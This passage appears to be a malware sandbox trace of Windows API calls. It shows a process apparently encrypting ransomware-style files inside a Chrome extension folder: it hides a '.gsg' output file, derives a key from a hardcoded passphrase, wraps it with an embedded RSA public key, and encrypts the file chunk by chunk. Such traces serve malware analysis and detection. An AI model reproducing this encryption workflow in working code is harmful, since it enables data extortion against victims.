lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0264.498] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.498] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.498] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0264.498] GetLastError () returned 0x0 [0264.498] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json")) returned 0x20 [0264.499] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x80) returned 1 [0264.499] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.500] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.506] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg", dwFileAttributes=0x2) returned 1 [0264.506] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0264.509] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0264.509] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.509] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.509] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7da00) returned 1 [0264.509] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.509] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0264.509] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e75c38) returned 1 [0264.510] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75c38, dwCertEncodingType=0x1, pInfo=0x2eaf8b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf8e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf8e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7de00) returned 1 [0264.510] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0264.510] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75cc0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e75cc0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0264.510] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e75cc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e75cc0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0264.511] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.519] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.519] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.521] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.521] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.521] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.521] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.521] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.522] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.523] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.524] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.525] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.525] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.525] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.525] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.525] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.526] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.526] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.526] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.526] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.526] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.527] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, 